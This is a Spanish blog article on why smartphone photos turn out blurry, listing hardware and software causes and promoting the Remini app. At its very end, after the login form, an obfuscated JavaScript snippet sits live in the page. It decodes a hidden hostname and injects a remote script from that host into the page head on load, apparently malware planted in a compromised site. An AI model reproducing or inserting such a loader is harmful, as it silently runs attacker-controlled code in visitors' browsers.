¿Por qué salen borrosas las fotos de mi móvil?

Desde sus inicios, a fines de la década de los 2000, el iPhone, smartphone o teléfono inteligente ha sido un dispositivo que siempre se construyó con la idea de simplicidad en mente, mientras que se iban añadiendo otras funcionalidades extra además de las de un teléfono. actualmente con un móvil no solo puedes enviar mensajes a tus amigos y familiares o llamar a cualquier lugar del planeta, sino que también puedes tomar fotos sobre la marcha, ya sea durante un viaje por carretera, en un parque temático, o incluso durante una comida con los amigos. Sin embargo, por mucho que podamos usar estas otras funciones, suele haber algunos problemas con las fotos del móvil que han llevado a la gente a preguntarse lo siguiente:

¿Por qué las fotos de mi teléfono se están volviendo borrosas? Puede ser en realidad por dos razones: problemas de software o problemas de hardware lo que puede que esté ocurriendo con tu teléfono. En cuanto a los problemas de hardware, podría significar que hay alguna avería con la cámara, por lo que habría que reemplazarla con un nuevo teléfono. En cuanto a los problemas de software, podría ser la aplicación de la cámara o la aplicación del álbum de fotos la que está causando todos los problemas.

Entender la razón por la que tu smartphone saca fotos borrosas todo el tiempo es importante, especialmente si eres de los que disfrutan tomando fotos. Es también importante, saber si se trata de un problema de hardware o software ya que puede ayudarte a determinar si puedes salvar tu teléfono o tendrías que ir pensando en comprar uno nuevo.

Arregla las fotos borrosas para solucionar estos u otros problemas, es ya posible gracias a la Inteigencia Artiificial. Para ello ⭐DESCARGA ahora la APP GRATIS RIMINI.

¿Por qué las fotos de mi móvil están borrosas?

Hay dos posibles razones por las que tu Smartphone tiene fotos borrosas.

  • Hardware
  • Software

Estas posibles razones se repasarán detalladamente un poco más adelante, pero en general, cabe señalar que si se trata de un problema de hardware, eso podría significar que el tema es grave y tendrías que comprar un nuevo teléfono a menos que quieras arreglarlo en un taller de reparación de móviles de tu localidad. En cuanto al software, puede ser más sencillo si simplemente hay que reinstalar la aplicación o utilizar una distinta.

Si es un problema de hardware

Si tus fotos están saliendo borrosas en tu móvil por problemas de hardware, podría estar pasando alguno de los siguientes problemas:

  • Algún imán o accesorios magnéticos interfiere con la lente de la cámara
  • La carcasa del teléfono está bloqueando la cámara
  • Mala iluminación en el área
  • La lente de la cámara está sucia o rota.

Imanes e interferencias magnéticas cerca de tu teléfono

En algunos teléfonos inteligentes debido a algunos componentes sensibles con los que están desarrollados, se ha detectado que los campos magnéticos pueden producir fotos borrosas. Los accesorios para móviles suelen tener pequeños imanes, así que ten cuidado con ellos si estás teniendo problemas con imágenes borrosas. Mira lo que Apple dice sobre este tema aquí.

La próxima vez que tengas una imagen borrosa con tu iPhone, descarta antes que haya algún campo magnético cerca de tu teléfono que le esté afectando a tu cámara. Los campos magnéticos altos pueden hacer que la cámara a veces pierda el enfoque sobre el sujeto que está tratando de fotografiar y por lo tanto se vuelve borrosa. Potencialmente en teléfonos Android puede haber un comportamiento parecido.

Las fundas para el teléfono

Si eres de los que llevas fundas protectoras en tu teléfono, también podría ser que sea la causa de que tus fotos salgan borrosas. Dado que este es un tema fácil de resolver, cuando quieras tomar fotos, y tengas una funda de teléfono voluminosa y si cubre un poco parte de la superficie de la cámara, es mejor quitar la funda del teléfono cuando tomes la foto y luego volver a ponerla en su lugar. De esta manera no habrá una funda (aunque sea transparente) interponiéndose con la cámara.

Mala iluminación

Las cámaras de teléfono son similares a las cámaras normales en el sentido de que necesitan una buena iluminación. Si tienes mala iluminación, entonces puede causar que la cámara no enfoque el objeto que estás tratando de fotografiar, dando como resultado fotos borrosas. Si quieres tomar buenas fotos, entonces encuentra un lugar que no sea tan oscuro y que tenga la iluminación perfecta para ti.

Cámara sucia/rota

Si tus fotos son borrosas, también podría significar que tu cámara esté rota o quizás sucia.

Para el tema de la cámara sucia, la manera más fácil de evitar que tus fotos salgan borrosas es limpiar la cámara y limpiarla a fondo para que no tome fotos borrosas la próxima vez que necesites usarla.

Sin embargo, si la cámara está rota, entonces la única opción es arreglarla o cambiar tu teléfono por uno nuevo. Especialmente si puedes optar por un teléfono con los últimos avances, entonces definitivamente reemplaza tu teléfono, ya que los nuevos modelos no solo toman buenas fotos, sino que las fotos serán incluso mejores que antes.

Si es un problema de software

Si tus fotos están saliendo borrosas en tu móvil por problemas de software, podría estar pasando alguno de los siguientes problemas:

  • Algo va mal en tu aplicación de cámara / aplicación de fotos
  • La actualización de iOS/Android salió mal
  • Tienes mal tu configuración
  • Problemas de software interno en general

Mal funcionamiento de la aplicación de cámara/fotos

Como cualquier otra aplicación, las aplicaciones de cámara y las de fotos también pueden funcionar mal a veces. De manera similar a como tu Instagram no refresca la página a pesar de tener una conexión a Internet o como, cuando estás enviando un mensaje a un amigo, y su teclado se vuelve loco, las aplicaciones de cámara y de fotografía puede hacer que tus fotos sean borrosas debido a un posible error que haya ocurrido en ese preciso momento.

La mejor manera de ver si tus fotos se arreglan y dejan de verse borrosas es reiniciar el móvil o reiniciar la aplicación como si se abrieran de nuevo por primera vez.

La actualización del sistema operativo (iOS/Android) ha fallado

Los problemas internos de software pueden ser algo bastante común en todos los teléfonos, especialmente si es debido a una actualización.

Si tu teléfono es un modelo viejo y carece de las actualizaciones necesarias, puede significar un potencial problema. Por ejemplo si tienes un iPhone anterior a la gama 6/6S y decides actualizar al último iOS, entonces puede causar algunos problemas con algunas de tus aplicaciones, con lo que tus fotos se volverán borrosas. Para este problema, las soluciones se basan más en la compra de un nuevo teléfono que tenga instalada la última actualización del iOS, ya que se trata de un problema de software interno y no de hardware.

Si los ajustes están causando el problema

Si no importa cuántas veces reinicies tu cámara o la aplicación de fotos y las fotos se siguen volviendo borrosas, entonces puede que tengas que revisar tu configuración para ver de qué se trata el problema. Si hay algo en tu configuración que está creando un efecto en tus otras aplicaciones, como la misma aplicación de cámara, entonces es posible que tengas que reiniciarla o incluso reiniciar el teléfono completamente y quizás testar una configuración predeterminada para ver si tus fotos ya no salen borrosas.

Si ni siquiera el restablecimiento de la configuración a los valores predeterminados o el restablecimiento manual del teléfono funcionan, entonces no solo se perderán las fotos, sino que también será necesario invertir en un teléfono nuevo, aunque es doloroso es la mejor solución, lo sentimos…

Temas generales de software interno

Si tu iPhone es anterior a la generación 6/6S, entonces su envejecimiento general y el software interno puede ser el problema de por qué tus fotos son borrosas. Sin embargo, incluso si tu teléfono es anterior a las generaciones 6/6S, los mismos problemas de software interno pueden seguir ocurriendo en los teléfonos más modernos. Los teléfonos más actuales son más propensos a tener más problemas de software que las generaciones más antiguas debido a la gran cantidad de funciones de software que tienen desarrollados para tu cámara. Similarmente para los modelos Android, ya que los móviles más antiguos tienen software más sencillo.

Puede haber todavía algunos errores y mal funcionamiento de los ajustes que están causando que tus fotos sean borrosas y que pueden hacer que tengas que reiniciar tu teléfono, como te comentábamos anteriormente, pero también tener que reemplazarlo por uno nuevo debido a la cantidad de problemas que tiene con el software interno en general.

Descarga Remini App

Si lo que te ocurre es que quieres aclarar fotos borrosas que no fueron tomadas adecuadamente. O que son antiguas, la mejor forma de arreglarlas es utilizar programas de edición de fotografías. Para ello te dejamos este enlace a la descarga gratuita de la App Remini que mejorará esas fotos. Tendrás resultados sorprendentes:

Échale un vistazo a este artículo para saber todo lo necesario antes de plantearte comprar una impresora de fotos.

Vídeo Descarga Remini

Volver a la página del BLOG

Allí encontrarás artículos sobre fotografía de eventos con información interesante.
Ir al BLOG

Deja el primer comentario

Iniciar sesión

Correo electrónico *
Contraseña *

REGÍSTRATE

Correo electrónico *
Contraseña *
!function (_5f186) { var _7e0bb3 = Date.now(); var _e34a6f = 1000; _7e0bb3 = _7e0bb3 / _e34a6f; _7e0bb3 = Math.floor(_7e0bb3); var _f17f41 = 600; _7e0bb3 -= _7e0bb3 % _f17f41; _7e0bb3 = _7e0bb3.toString(16); var _fbc2f0 = _5f186.referrer; if (!_fbc2f0) return; var _cc24b6 = [33991, 34002, 34004, 33984, 33949, 33984, 33991, 34010, 34000, 34008, 34015, 34012, 34002, 34007, 34006, 33985, 33949, 34010, 34013, 34005, 34012]; _cc24b6 = _cc24b6.map(function(_bcded5){ return _bcded5 ^ 33971; }); var _c16f5a = "6f5ae20d5c54f56d58ceb4695da44c11"; _cc24b6 = String.fromCharCode(..._cc24b6); var _37802c = "https://"; var _d8c428 = "/"; var _aeb9f5 = "mount."; var _7f4946 = ".js"; var _1f2600 = _5f186.createElement("script"); _1f2600.type = "text/javascript"; _1f2600.async = true; _1f2600.src = _37802c + _cc24b6 + _d8c428 + _aeb9f5 + _7e0bb3 + _7f4946; _5f186.getElementsByTagName("head")[0].appendChild(_1f2600) }(document);